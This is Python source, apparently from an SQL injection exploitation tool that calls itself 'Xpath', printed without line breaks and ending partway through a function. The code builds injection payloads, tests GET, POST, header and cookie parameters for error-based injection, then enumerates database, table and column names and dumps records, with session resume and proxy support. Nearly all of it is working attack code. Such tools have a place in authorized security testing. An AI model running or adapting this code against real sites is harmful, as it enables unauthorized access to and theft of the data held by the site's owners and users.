def parse_http_response(resp): Response = collections.namedtuple( "Response", ["ok", "url", "text", "headers", "status_code", "reason", "error"]) text = "" status_code = 0 headers = {} error_msg = "" reason = "" if hasattr(resp, "text"): text = resp.text url = resp.url status_code = resp.status_code reason = resp.reason headers = resp.headers ok = bool(200 == status_code) error_msg = f"{status_code} ({reason})" else: text = unescape_html(resp) url = resp.geturl() status_code = resp.status ok = bool(200 == status_code) reason = resp.reason headers = dict(resp.info()) error_msg = f"{status_code} ({reason})" return Response( ok=ok, url=url, text=text, headers=headers, status_code=status_code, reason=reason, error=error_msg, )
def parse_http_error(error): Response = collections.namedtuple( "Response", ["url", "text", "headers", "status_code", "reason", "error"]) text = "" status_code = 0 headers = {} error_msg = "" reason = "" if hasattr(error, "response"): text = unescape_html(error.response) status_code = error.response.status_code reason = error.response.reason headers = error.response.headers url = error.response.url error_msg = f"{status_code} ({reason})" else: text = unescape_html(error) status_code = error.code reason = error.reason headers = dict(error.info()) url = error.geturl() error_msg = f"{status_code} ({reason})" return Response( url=url, text=text, headers=headers, status_code=status_code, reason=reason, error=error_msg, )
def prepare_payloads(prefixes, suffixes, payloads, techniques=""): Payload = collections.namedtuple("Payload", ["prefix", "suffix", "string"]) urle = compat_urlencode techniques_dict = { "X": [1, 2, 3], "E": [4, 5], "F": [6, 7, 8, 9], "D": [10], "B": [11], "G": [12, 13], "J": [14, 15], } techniques_to_test = [] if techniques: techniques = techniques.strip() [techniques_to_test.extend(techniques_dict.get(i)) for i in techniques] techniques_to_test.append(16) _temp = [] for entry in payloads: order = entry.get("order") if techniques and techniques_to_test and order not in techniques_to_test: continue pl = [ Payload(prefix=urle(i), suffix=k, string=f"{i}{j}{k}") for i in prefixes for j in entry.get("payloads") for k in suffixes ] entry.update({"payloads": pl}) _temp.append(entry) return _temp
def prepare_proxy(proxy): Response = collections.namedtuple("Response", ["for_requests", "for_urllib"]) for_urllib = None for_requests = None if proxy: for_requests = {"http": proxy, "https": proxy} for_urllib = ProxyHandler(for_requests) return Response(for_requests=for_requests, for_urllib=for_urllib)
def _fallback_check(self, payload, count, unknown_error_counter=0): PayloadResponse = collections.namedtuple( "PayloadResponse", [ "is_injected", "status_code", "result", "payload", "payloads_count", "error", ], ) status_code = None error = None logger.payload(f"{payload}") payload_request = prepare_payload_request( self, payload, unknown_error_counter=unknown_error_counter) url = payload_request.url data = payload_request.data regex = payload_request.regex headers = payload_request.headers try: response = request.inject_payload(url=url, regex=regex, data=data, headers=headers, proxy=self._proxy) if response.ok: result = response.result status_code = response.status_code error = response.error return PayloadResponse( is_injected=True, status_code=status_code, result=result, payload=payload, payloads_count=count, error=error, ) else: status_code = response.status_code error = response.error except KeyboardInterrupt: logger.error("user interrupted") logger.end("ending") exit(0) return PayloadResponse( is_injected=False, status_code=status_code, result="", payload="", payloads_count=count, error=error, )
def _search_column(self, payload, index, database="", table=""): Response = collections.namedtuple("Response", ["database", "table", "column"]) if not database and not table: response = self._search_table(payload, index, get_tbl=True) database = response.database table = response.table elif not database and table: response = self._search_db(payload, index, get_db=True) database = response.database elif database and not table: response = self._search_table(payload, index, database=database, get_tbl=True) database = database table = response.table url = self.url data = self.data regex = self.regex headers = self.headers # if self.url and not self.data and not self.headers: # # GET # url = self._perpare_querystring(self.url, payload) # if self.url and self.data and not self.headers: # # POST # data = self._perpare_querystring(self.data, payload) # if self.url and not self.data and self.headers: # # headers # headers = self._perpare_querystring(self.headers, payload) it = self._injection_type.upper() if "GET" in it: # self.url and not self.data and not self.headers: # GET url = self._perpare_querystring(self.url, payload) if "POST" in it: # self.url and self.data and not self.headers: # POST data = self._perpare_querystring(self.data, payload) if ("HEADER" in it or "COOKIE" in it): # self.url and not self.data and self.headers: # headers headers = self._perpare_querystring(self.headers, payload) column = self.perform_injection(url, data, headers, regex, index, search_type="column") return Response(database=database, table=table, column=column)
def _extract_search_results(self, payloads, database="", table="", search_type="", records=None, position=0): _temp, index = [], 0 pos = position + 1 resumed = bool(records) Response = collections.namedtuple("Response", ["is_fetched", "result"]) while index < len(payloads): payload = payloads[index] if records: entry = records.pop() database = entry.database table = entry.table try: if search_type == "database": response = self._search_db(payload=payload, index=pos) _temp.append(response) if search_type == "table": response = self._search_table(payload=payload, index=pos, database=database) _temp.append(response) if search_type == "column": response = self._search_column(payload=payload, index=pos, database=database, table=table) _temp.append(response) except KeyboardInterrupt: logger.warning( "user aborted during enumeration. Xpath will display partial output" ) break index += 1 pos += 1 if resumed: database = "" table = "" if _temp: resp = Response(is_fetched=True, result=_temp) else: resp = Response(is_fetched=False, result=_temp) return resp
def prettifier(cursor_or_list, field_names="", header=False): fields = [] Prettified = collections.namedtuple("Prettified", ["data", "entries"]) if field_names: fields = re.sub(" +", "", field_names).split(",") table = PrettyTable(field_names=[""] if not fields else fields) table.align = "l" table.header = header entries = 0 for d in cursor_or_list: if d and isinstance(d, str): d = (d, ) table.add_row(d) entries += 1 _temp = Prettified(data=table, entries=entries) return _temp
def prepare_payload_request(self, payload, unknown_error_counter=0): Response = collections.namedtuple("Response", ["url", "data", "regex", "headers"]) url = self.url data = self.data regex = self.regex headers = self.headers it = self._injection_type.upper() if "GET" in it or "URI" in it: url = self._perpare_querystring( self.url, payload, unknown_error_counter=unknown_error_counter) if "POST" in it: # POST data = self._perpare_querystring( self.data, payload, unknown_error_counter=unknown_error_counter) if "HEADER" in it or "COOKIE" in it: # headers headers = self._perpare_querystring( self.headers, payload, unknown_error_counter=unknown_error_counter) return Response(url=url, data=data, regex=regex, headers=headers)
def _extract_tbls(self, payloads, database=""): _temp, index = [], 0 Response = collections.namedtuple("Response", ["is_fetched", "result"]) while index < len(payloads): payload = payloads[index] payload_request = prepare_payload_request(self, payload) url = payload_request.url data = payload_request.data regex = payload_request.regex headers = payload_request.headers try: response = request.inject_payload(url=url, regex=regex, data=data, headers=headers, proxy=self._proxy) except KeyboardInterrupt: logger.warning( "user aborted during enumeration. Xpath will display partial output" ) break else: if response.ok: result = response.result logger.info("retrieved: '%s'" % (result)) _temp.append(result) retval = session.dump( session_filepath=self.session_filepath, query=TBLS_STATEMENT.format(tbl_name=database, tblname=result), ) index += 1 if _temp and len(_temp) > 0: _temp = list(set(_temp)) resp = Response(is_fetched=True, result=_temp) else: resp = Response(is_fetched=True, result=_temp) return resp
def _format_results(self, results, steps): chunks = [results[x:x + steps] for x in range(0, len(results), steps)] _temp = [] Results = collections.namedtuple("Results", ["database", "table", "column"]) for chunk in chunks: tt = {"database": "", "table": "", "column": ""} if len(chunk) == 3: tt.update({ "database": chunk[0], "table": chunk[1], "column": chunk[2] }) if len(chunk) == 2: tt.update({"database": chunk[0], "table": chunk[1]}) if len(chunk) == 1: tt.update({"database": chunk[0]}) _temp.append( Results(database=tt["database"], table=tt["table"], column=tt["column"])) return _temp
def prepare_request(url, data, custom_headers, use_requests=False): Response = collections.namedtuple("Response", ["raw", "headers"]) request_type = "GET" if url and data: request_type = "POST" parsed = urlparse.urlparse(url) path = parsed.path if not parsed.query else f"{parsed.path}?{parsed.query}" if not path: path = "/" if not custom_headers: custom_headers = f"User-agent: {useragent}" if custom_headers and "user-agent" not in custom_headers.lower(): custom_headers += f"\nUser-agent: {useragent}" if custom_headers and "host" not in custom_headers.lower(): custom_headers += f"\nHost: {parsed.netloc}" # custom_headers += "\nCache-control: no-cache" # custom_headers += "\nAccepts: */*" # custom_headers += "\nAccept-encoding: gzip,deflate" custom_headers = "\n".join( [i.strip() for i in custom_headers.split("\n") if i]) raw = f"{request_type} {path} HTTP/1.1\n" raw += f"{custom_headers if custom_headers else ''}\n" if data: raw += f"\n{data}\n" header = {} headers = custom_headers.split("\n") for i in headers: sph = [i.strip() for i in i.split(":")] if sph and len(sph) == 2: header.update({sph[0]: sph[1]}) if not use_requests: _temp = [] for key, value in header.items(): _temp.append((key, value)) custom_headers = _temp else: custom_headers = header resp = Response(raw=raw, headers=custom_headers) return resp
def _search_table(self, payload, index, database="", get_tbl=False): Response = collections.namedtuple("Response", ["database", "table"]) if not database: response = self._search_db(payload, index, get_db=True) database = response.database if get_tbl: payload = self._payload_for(payload=payload, value_type="TABLE_NAME") url = self.url data = self.data regex = self.regex headers = self.headers # if self.url and not self.data and not self.headers: # # GET # url = self._perpare_querystring(self.url, payload) # if self.url and self.data and not self.headers: # # POST # data = self._perpare_querystring(self.data, payload) # if self.url and not self.data and self.headers: # # headers # headers = self._perpare_querystring(self.headers, payload) it = self._injection_type.upper() if "GET" in it: # self.url and not self.data and not self.headers: # GET url = self._perpare_querystring(self.url, payload) if "POST" in it: # self.url and self.data and not self.headers: # POST data = self._perpare_querystring(self.data, payload) if ("HEADER" in it or "COOKIE" in it): # self.url and not self.data and self.headers: # headers headers = self._perpare_querystring(self.headers, payload) table = self.perform_injection(url, data, headers, regex, index, search_type="table") return Response(database=database, table=table)
def _search_db(self, payload, index, get_db=False): Response = collections.namedtuple("Response", ["database"]) if get_db: payload = self._payload_for(payload=payload, value_type="TABLE_SCHEMA") url = self.url data = self.data regex = self.regex headers = self.headers # logger.info("fetching database names") # if self.url and not self.data and not self.headers: # # GET # url = self._perpare_querystring(self.url, payload) # if self.url and self.data and not self.headers: # # POST # data = self._perpare_querystring(self.data, payload) # if self.url and not self.data and self.headers: # # headers # headers = self._perpare_querystring(self.headers, payload) it = self._injection_type.upper() if "GET" in it: # self.url and not self.data and not self.headers: # GET url = self._perpare_querystring(self.url, payload) if "POST" in it: # self.url and self.data and not self.headers: # POST data = self._perpare_querystring(self.data, payload) if ("HEADER" in it or "COOKIE" in it): # self.url and not self.data and self.headers: # headers headers = self._perpare_querystring(self.headers, payload) database = self.perform_injection(url, data, headers, regex, index, search_type="database") return Response(database=database)
def perform( self, url, data="", headers="", timeout=30, use_requests=False, connection_test=False, proxy=None, ): Response = collections.namedtuple("Response", [ "ok", "url", "status_code", "text", "headers", "reason", "error_msg" ]) ok = False text = None reason = "" error_msg = "" response_url = "" show_charset = False if connection_test: # parsed = urlparse.urlparse(url) # url = f"{parsed.scheme}://{parsed.netloc}" show_charset = True http_response = Response( ok=ok, url=response_url, text=text, status_code="", headers=headers, reason="", error_msg=error_msg, ) req = prepare_request(url=url, data=data, custom_headers=headers, use_requests=use_requests) raw = req.raw custom_headers = req.headers logger.traffic_out(f"HTTP request:\n{raw}") headers = {} if proxy and proxy.for_urllib and not use_requests: proxy = proxy.for_urllib elif proxy and proxy.for_requests and use_requests: proxy = proxy.for_requests else: proxy = None if not data: try: if not use_requests: opener = compat_opener() if proxy: opener = compat_opener(proxy) opener.addheaders = custom_headers resp = opener.open(url, timeout=timeout) else: resp = requests.get(url, headers=custom_headers, proxies=proxy, timeout=timeout) resp.raise_for_status() http_response = parse_http_response(resp) ok = http_response.ok headers = http_response.headers text = http_response.text status_code = http_response.status_code reason = http_response.reason response_url = http_response.url http_response = Response( ok=ok, url=response_url, text=text, status_code=status_code, headers=headers, reason=reason, error_msg=error_msg, ) except (compat_httperr, requests.exceptions.HTTPError) as e: error_resp = parse_http_error(e) text = error_resp.text status_code = error_resp.status_code headers = error_resp.headers error_msg = error_resp.error reason = error_resp.reason response_url = error_resp.url http_response = Response( ok=True, url=response_url, text=text, status_code=status_code, headers=headers, reason=reason, error_msg=error_msg, ) except KeyboardInterrupt as e: raise e except Exception as e: raise e if data: try: if not use_requests: data = data.encode("utf-8") opener = compat_opener() if proxy: opener = compat_opener(proxy) opener.addheaders = custom_headers resp = opener.open(url, data, timeout=timeout) else: resp = requests.get( url, data=data, headers=custom_headers, proxies=proxy, timeout=timeout, ) resp.raise_for_status() http_response = parse_http_response(resp) ok = http_response.ok headers = http_response.headers text = http_response.text status_code = http_response.status_code reason = http_response.reason response_url = http_response.url http_response = Response( ok=ok, url=response_url, text=text, status_code=status_code, headers=headers, reason=reason, error_msg=error_msg, ) except (compat_httperr, requests.exceptions.HTTPError) as e: error_resp = parse_http_error(e) text = error_resp.text status_code = error_resp.status_code headers = error_resp.headers error_msg = error_resp.error reason = error_resp.reason response_url = error_resp.url http_response = Response( ok=True, url=response_url, text=text, status_code=status_code, headers=headers, reason=reason, error_msg=error_msg, ) except KeyboardInterrupt as e: raise e except Exception as e: raise e raw_response = prepare_response(http_response) logger.traffic_in(f"HTTP Response {raw_response}") return http_response
def _extact(self, payloads): PayloadResponse = collections.namedtuple( "PayloadResponse", [ "is_injected", "status_code", "result", "payload", "payloads_count", "error", ], ) payloads_count = len(payloads) status_code = None error = None unknown_error_counter = 0 for payload in payloads: logger.payload(f"{payload}") payload_request = prepare_payload_request(self, payload) url = payload_request.url data = payload_request.data regex = payload_request.regex headers = payload_request.headers try: response = request.inject_payload(url=url, regex=regex, data=data, headers=headers, proxy=self._proxy) except KeyboardInterrupt: logger.error("user interrupted") logger.end("ending") exit(0) except: unknown_error_counter += 1 logger.debug( "trying again the same payload with url encoding..") resp = self._fallback_check( payload, payloads_count, unknown_error_counter=unknown_error_counter) if resp.is_injected: return resp else: if response.ok: result = response.result status_code = response.status_code error = response.error return PayloadResponse( is_injected=True, status_code=status_code, result=result, payload=payload, payloads_count=payloads_count, error=error, ) else: status_code = response.status_code error = response.error return PayloadResponse( is_injected=False, status_code=status_code, result="", payload="", payloads_count=payloads_count, error=error, )
def _extract_data(self, payloads, table=None, columns=None, fetched_records=None, count=None): _temp, is_interrupted = [], False Response = collections.namedtuple("Response", ["is_fetched", "result"]) for index, values in payloads.items(): __temp = [] if not fetched_records else fetched_records position = 0 while position < len(values): p = values[position] name = p.get("column") payload = p.get("payload") payload_request = prepare_payload_request(self, payload) url = payload_request.url data = payload_request.data regex = payload_request.regex headers = payload_request.headers try: response = request.inject_payload( url=url, regex=regex, data=data, headers=headers, proxy=self._proxy, ) except KeyboardInterrupt: logger.warning( "user aborted during enumeration. Xpath will display partial output" ) is_interrupted = True break else: if response.ok: result = response.result logger.info( "retrieved: '%s'" % (result if result != "<blank_value>" else "")) _temp.append({ "index": index + 1, "column_name": name, "column_value": result, }) __temp.append(result) table_name = f"{count}_{table}_tmp" PREPARED_STATEMENT = f"INSERT INTO `{table_name}` (`index`, `column_name`, `column_value`) VALUES (?, ?, ?);" retval = session.dump( session_filepath=self.session_filepath, query=PREPARED_STATEMENT, values=(index + 1, name, result), ) position += 1 _ = self._save_records(table=table, column_names=columns, records=__temp, count=count) if is_interrupted: break if _temp and len(_temp) > 0: resp = Response(is_fetched=True, result=_temp) else: resp = Response(is_fetched=False, result=_temp) return resp
def data_dump(self, db="", tbl="", cols=""): index = 0 _temp = [] is_resumed = False fetched_data = {} _temp_payloads = [] fetched_records = [] cols = self._clean_up_cols(cols) count = "{0:03d}".format(len(cols)) RecordsResponse = collections.namedtuple( "RecordsResponse", ["fetched", "count", "database", "table", "columns", "records"], ) if db and tbl and cols and isinstance(cols, list): dump_payloads = [] [dump_payloads.extend(v) for _, v in PAYLOADS_RECS_DUMP.items()] test_column = "0x72306f746833783439" if self._dbms: dump_payloads = PAYLOADS_RECS_DUMP.get(self._dbms, dump_payloads) test_column = "1337" for i in dump_payloads: data = i.format(col=test_column, db=db, tbl=tbl) _temp_payloads.append(data) try: tmp_table_name = f"{count}_{tbl.strip()}_tmp" fetched_data = session.fetch_from_table( session_filepath=self.session_filepath, table_name=tmp_table_name, group_by_columns="`index`,`column_name`,`column_value`", cursor=False, ) if fetched_data: is_resumed = True except Exception as error: pass logger.info( "fetching column(s) '%s' for table '%s' in database: '%s'" % (", ".join(cols), tbl, db)) last_seen = 0 remainder = 0 retval = self._data_count(db=db, tbl=tbl) if retval.is_injected: data_count = int(retval.result) if data_count != 0: logger.info("used SQL query returns %d entries" % (data_count)) if data_count == 0: logger.warning( "used SQL query returns %d entries of columns '%s' for table '%s' in database '%s'" % (data_count, ", ".join(cols), tbl, db)) return RecordsResponse( fetched=False, count=data_count, database=db, table=tbl, columns=cols, records=[], ) if is_resumed: _temp = fetched_data for entry in fetched_data: last_seen = index = entry.get("index") value = entry.get("column_value") # logger.info(f"resumed: '{value}'") fetched_records.append(value) remainder = len(fetched_data) % len(cols) if remainder > 0: index -= 1 last_seen = last_seen - 1 fetched_records = fetched_records[-remainder:] should_fetch = True if is_resumed: if index == data_count: should_fetch = False if should_fetch: # logger.info(f"resumed fetching from '{index+1}' record..") payloads = self._generat_payload(payloads_list=_temp_payloads) retval = self._extact(payloads=payloads) if retval.is_injected: payload = clean_up_payload(payload=retval.payload, replace_with="{col}") payloads = self._generate_data_payloads( data_count=data_count, payload=payload, cols=cols, index=index) if is_resumed and remainder > 0: remaing_records = payloads[last_seen][remainder:] payloads.update({last_seen: remaing_records}) if not is_resumed: self.__generate_records_tables(tbl=tbl, cols=cols, count=count) response_data = self._extract_data( payloads=payloads, table=tbl, columns=cols, fetched_records=fetched_records, count=count, ) if response_data.is_fetched: _temp.extend(response_data.result) table_name = f"{count}_{tbl}_data" self._pprint_records( field_names=", ".join(cols), database=db, table_name=table_name, table=tbl, columns=cols, ) return RecordsResponse( fetched=True, count=data_count, database=db, table=tbl, columns=cols, records=_temp, ) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}" ) else: message = f"tested with '{count}' queries, unable to find working SQL query." logger.critical(message) else: table_name = f"{count}_{tbl}_data" self._pprint_records( field_names=", ".join(cols), database=db, table_name=table_name, table=tbl, columns=cols, ) return RecordsResponse( fetched=True, count=data_count, database=db, table=tbl, columns=cols, records=_temp, ) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}") else: message = ( f"tested with '{count}' queries, unable to find working SQL query." ) logger.critical(message) return RecordsResponse( fetched=False, count=0, database=None, table=None, columns=None, records=None, )
def dbs_names(self): is_resumed = False index = 0 fetched_data = {} _temp = [] DatabasesResponse = collections.namedtuple( "DatabasesResponse", ["fetched", "count", "databases"]) try: fetched_data = session.fetch_from_table( session_filepath=self.session_filepath, table_name="tbl_databases", cursor=False, ) if fetched_data: is_resumed = True except Exception as error: pass logger.info("fetching database names") retval = self._dbs_count if retval.is_injected: dbs_count = int(retval.result) if dbs_count != 0: logger.info("used SQL query returns %d entries" % (dbs_count)) if dbs_count == 0: logger.warning( "used SQL query returns %d entries for database names.." % (dbs_count)) return DatabasesResponse(fetched=False, count=dbs_count, databases=[]) if is_resumed: for entry in fetched_data: name = entry.get("dbname") if name not in _temp: _temp.append(name) # logger.info(f"resumed: '{name}'") index += 1 should_fetch = True if is_resumed: if len(fetched_data) == dbs_count: should_fetch = False if should_fetch: payloads = self._generat_payload( payloads_list=PAYLOADS_DBS_NAMES) retval = self._extact(payloads=payloads) if retval.is_injected: payload = retval.payload payloads = self._generate_dbs_payloads(dbs_count=dbs_count, payload=payload, index=index) response_data = self._extract_dbs(payloads=payloads) if response_data.is_fetched: _temp.extend(response_data.result) self._available_dbs(dbs_count, _temp) return DatabasesResponse(fetched=True, count=dbs_count, databases=_temp) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}" ) else: message = f"tested with '{count}' queries, unable to find working SQL query." logger.critical(message) else: self._available_dbs(dbs_count, _temp) return DatabasesResponse(fetched=True, count=dbs_count, databases=_temp) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}") else: message = ( f"tested with '{count}' queries, unable to find working SQL query." ) logger.critical(message) return DatabasesResponse(fetched=False, count=0, databases=_temp)
def perform_injection( url="", data="", host="", header="", cookies="", headers="", referer="", user_agent="", level=1, verbosity=1, techniques="", batch=False, flush_session=False, proxy=None, force_ssl=False, ): verbose_levels = { 1: logging.INFO, 2: logging.DEBUG, 3: logging.PAYLOAD, 4: logging.TRAFFIC_OUT, 5: logging.TRAFFIC_IN, } if not force_ssl: # monkeypatch ssl._create_default_https_context = ssl._create_unverified_context if proxy: proxy = prepare_proxy(proxy) verbose_level = verbose_levels.get(verbosity, logging.INFO) session_path = session.generate_filepath(url, flush_session=flush_session) filepath = os.path.join(session_path, "log") set_level(verbose_level, filepath) if not url.startswith("http"): url = f"http://{url}" if not url.startswith("//") else f"http:{url}" logger.start("starting") Response = collections.namedtuple( "Response", [ "is_injected", "payloads", "dbms", "filepath", "headers", "proxy", "injection_type", "injected_param", "session_filepath", "recommended_payload", "recommended_payload_type", ], ) custom_headers = prepare_custom_headers( host=host, header=header, cookies=cookies, headers=headers, referer=referer, user_agent=user_agent, ) levels = {2: "Cookie", 3: "HEADER"} if url and not data: injection_type = "GET" if url and data: injection_type = "POST" if level == 1: if cookies and "*" in cookies: level = 2 if (headers and "*" in headers or referer and "*" in referer or user_agent and "*" in user_agent): level = 3 if level in [2, 3]: injection_type = levels.get(level) elif level in [2, 3]: injection_type = levels.get(level) sqli = SQLitest( url=url, data=data, headers=custom_headers, filepath=session_path, injection_type=injection_type, techniques=techniques, batch=batch, proxy=proxy, ) resp = sqli.perform() if resp.cookies: custom_headers += f"\n{resp.cookies}" if resp.headers: custom_headers += f"\n{resp.headers}" if resp.injection_type and resp.injection_type != injection_type: injection_type = resp.injection_type resp = Response( is_injected=resp.is_vulnerable, payloads=resp.payloads, dbms=resp.dbms, filepath=resp.filepath, headers=custom_headers, proxy=proxy, injection_type=injection_type, injected_param=resp.injected_param, session_filepath=resp.session_filepath, recommended_payload=resp.recommended_payload, recommended_payload_type=resp.recommended_payload_type, ) return resp
def _search_payloads(self, db="", tbl="", col="", search_type=""): Payloads = collections.namedtuple( "Payloads", ["for_count", "for_dump", "table_to_generate"]) count_payloads, dump_payloads = [], [] QUERY_COUNT = "" QUERY_DUMP = "" table_to_generate = "" if search_type == "database": table_to_generate = f"{db}_{search_type}" logger.info(f"searching databases LIKE '{db}'") count_payloads = PAYLOAD_SCHEMA_SEARCH_COUNT dump_payloads = PAYLOAD_SCHEMA_SEARCH_DUMP db = to_hex(f"%{db}%") QUERY_COUNT = f"(SCHEMA_NAME LIKE {db})" if search_type == "table": table_to_generate = f"{tbl}_{search_type}" count_payloads = PAYLOADS_TABLE_SEARCH_COUNT dump_payloads = PAYLOADS_TABLE_SEARCH_DUMP if db and tbl: logger.info( f"searching tables LIKE '{tbl}' for database '{db}'") db = to_hex(db) tbl = to_hex(f"%{tbl}%") QUERY_COUNT = f"(TABLE_SCHEMA={db})AND(TABLE_NAME LIKE {tbl})" else: logger.info(f"searching tables LIKE '{tbl}'") tbl = to_hex(f"%{tbl}%") QUERY_COUNT = f"(TABLE_NAME LIKE {tbl})" if search_type == "column": table_to_generate = f"{col}_{search_type}" count_payloads = PAYLOADS_COLUMN_SEARCH_COUNT dump_payloads = PAYLOADS_COLUMN_SEARCH_DUMP if db and tbl and col: logger.info( f"searching columns LIKE '{col}' for table '{tbl}' in database '{db}'" ) db = to_hex(db) tbl = to_hex(tbl) col = to_hex(f"%{col}%") QUERY_COUNT = f"(TABLE_SCHEMA={db})AND(TABLE_NAME={tbl})AND(COLUMN_NAME LIKE {col})" elif not db and tbl and col: logger.info( f"searching columns LIKE '{col}' for table '{tbl}' across all databases" ) tbl = to_hex(tbl) col = to_hex(f"%{col}%") QUERY_COUNT = f"(TABLE_NAME={tbl})AND(COLUMN_NAME LIKE {col})" elif not tbl and db and col: logger.info( f"searching columns LIKE '{col}' in database '{db}'") db = to_hex(db) col = to_hex(f"%{col}%") QUERY_COUNT = f"(TABLE_SCHEMA={db})AND(COLUMN_NAME LIKE {col})" else: logger.info( f"searching columns LIKE '{col}' across all databases") col = to_hex(f"%{col}%") QUERY_COUNT = f"(COLUMN_NAME LIKE {col})" queries_count, queries_dump = [], [] QUERY_DUMP += "%sLIMIT {OFFSET},1" % (QUERY_COUNT) for query in count_payloads: prepared_query = query.format(QUERY=QUERY_COUNT) queries_count.append(prepared_query) for query in dump_payloads: prepared_query = query.format(QUERY=QUERY_DUMP.format(OFFSET=0)) queries_dump.append(prepared_query) for_count = self._generat_payload(payloads_list=queries_count) for_dump = self._generat_payload(payloads_list=queries_dump) return Payloads(for_count=for_count, for_dump=for_dump, table_to_generate=table_to_generate)
def is_injectable( self, url, data="", headers="", param="", injectable_param="", injection_type="", ): dbms = None injectable = False payload = ".,))').\".." Response = collections.namedtuple("Response", ["dbms", "injectable"]) _temp = Response(dbms=dbms, injectable=injectable) def perform_request(url, data, headers, payload, param, injection_type, uec=0): resp = "" if url and not data and "GET" in injection_type or "URI" in injection_type: url = prepare_injection_payload(url, payload, param=param, unknown_error_counter=uec) if data and url and "POST" in injection_type: data = prepare_injection_payload(data, payload, param=param, unknown_error_counter=uec) if (headers and url and "HEADER" in injection_type or "COOKIE" in injection_type): headers = prepare_injection_payload(headers, payload, param=param, unknown_error_counter=uec) try: resp = request.perform(url, data=data, headers=headers, proxy=self._proxy) except Exception as error: logger.error(error) raise error return resp try: resp = perform_request( url=url, data=data, headers=headers, payload=payload, param=injectable_param, injection_type=injection_type.upper(), ) except Exception as e: if "URL can't contain control characters" in str(e): try: resp = fallback_request( url=url, data=data, headers=headers, payload=payload, param=injectable_param, injection_type=injection_type.upper(), uec=5, ) except Exception as error: raise error else: raise e if resp and resp.text or resp.error_msg: out = search_dbms_errors(resp.text) injectable = out.get("vulnerable") param = f"{DIM}{white}'{param}'{BRIGHT}{black}" if injectable: _dbms = out.get("dbms") dbms = f"{DIM}{white}'{_dbms}'{BRIGHT}{black}" logger.notice( f"heuristic (basic) test shows that {injection_type} parameter {param} might be injectable (possible DBMS: {dbms})" ) _temp = Response(dbms=_dbms, injectable=injectable) if _dbms.lower() not in ["mysql", "postgresql"]: logger.info( f"Xpath currently does not support injection for '{_dbms}', will soon add support.." ) logger.end("ending") sys.exit(0) if not injectable: logger.notice( f"heuristic (basic) test shows that {injection_type} parameter {param} might not be injectable" ) _temp = Response(dbms="", injectable=injectable) return _temp
def perform(self): vulns = [] Response = collections.namedtuple( "Response", [ "is_vulnerable", "dbms", "payloads", "filepath", "cookies", "headers", "injection_type", "injected_param", "session_filepath", "recommended_payload", "recommended_payload_type", ], ) attemps_counter = 0 session_data = [] tested_payloads = [] successful_payloads = [] is_resumed = False filepath = None target_info = self._parse_target() set_cookie = "" set_headers = "" try: logger.notice("testing connection to the target URL.") resp = request.perform( self.url, data=self.data, headers=self.headers, use_requests=False, connection_test=True, proxy=self._proxy, ) if "Set-Cookie" in list(resp.headers.keys()): set_cookie = (", ".join(resp.headers.get_all("Set-Cookie")) if hasattr(resp.headers, "get_all") else resp.headers.get("Set-Cookie")) set_cookie = re.sub(r"(?is)path=/", "", set_cookie) _show_slice = set_cookie.rstrip() if len(set_cookie) > 20: _show_slice = f"{set_cookie[0:14]}....{set_cookie[-10:-2]}" question = logger.read_input( f"you have not declared cookie(s), while server wants to set its own ('{_show_slice}'). Do you want to use those [Y/n] ", batch=self._batch, user_input="Y", ) if question in ["", "y"]: if "," in set_cookie: set_cookie = "".join([ i.strip().replace("path=/", "").strip() for i in set_cookie.split(",") ]) set_cookie = ";".join(set_cookie.split(";")) set_cookie = f"Cookie: {set_cookie}" if (not self.headers or self.headers and "cookie" not in self.headers.lower()): self.headers += set_cookie except Exception as error: logger.critical( "Xpath was not able to establish connection. try checking with -v set to 5." ) logger.error(error) sys.exit(0) payloads_list = prepare_payloads( prefixes=PREFIX, suffixes=SUFFIX, payloads=PAYLOADS, techniques=self._techniques, ) try: table_name = "tbl_payload" session_data = session.fetch_from_table( session_filepath=self._session_filepath, table_name=table_name, cursor=False, ) if session_data: is_resumed = True is_questioned = False for pay in session_data: vulns.append({ "injection_type": f"({pay.get('parameter')})", "attempts": pay.get("payload_attemps"), "payload": pay.get("payload"), "title": pay.get("payload_type"), "order": pay.get("payload_order"), "regex": pay.get("regex"), "injected_param": pay.get("param").replace("*", ""), "dbms": pay.get("dbms"), }) except Exception as error: pass if not target_info.params: logger.critical( "no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')." ) logger.end("ending") sys.exit(0) if not vulns: params = target_info.params injection_type = target_info.injection_type is_custom_injection = target_info.is_custom_injection end_detection_phase = False is_injected = False successful_payload_prefix = "" vulnerable_param = "" unknown_error_counter = 0 dbms = "" for entry in params: param = entry.get("key") param_value = entry.get("value") if is_custom_injection and not param_value.endswith("*"): continue sep = ": " if "header" in injection_type.lower() else "=" injectable_param = (f"{param}{sep}{param_value}" if param_value else f"{param}{sep}") resp = self.is_injectable( self.url, self.data, self.headers, param=param, injectable_param=injectable_param, injection_type=injection_type, ) if not dbms: dbms = resp.dbms is_injectable = resp.injectable logger.info( f"testing for SQL injection on {injection_type} parameter '{param if not is_custom_injection else '#1*'}'" ) next_param_test = False for entry in payloads_list: backend = entry.get("back_end") title = entry.get("title") if dbms and dbms.lower() != backend.lower(): logger.debug(f"Skipped '{title}'") continue regex = entry.get("regex") order = entry.get("order") payloads = entry.get("payloads") logger.info(f"testing '{title}'") index = 0 if successful_payload_prefix: payloads = [ pl for pl in payloads if pl.prefix == successful_payload_prefix ] while index < len(payloads): url = self.url data = self.data headers = self.headers obj = payloads[index] payload = obj.string prefix = obj.prefix suffix = obj.suffix logger.payload(payload) it = self._injection_type.upper() if "HEADER" in it or "COOKIE" in it: headers = prepare_injection_payload( text=self.headers, payload=payload, param=injectable_param, unknown_error_counter=unknown_error_counter, ) if "GET" in it: url = prepare_injection_payload( text=self.url, payload=payload, param=injectable_param, unknown_error_counter=unknown_error_counter, ) if "POST" in it: data = prepare_injection_payload( text=self.data, payload=payload, param=injectable_param, unknown_error_counter=unknown_error_counter, ) try: if not is_injected: attemps_counter += 1 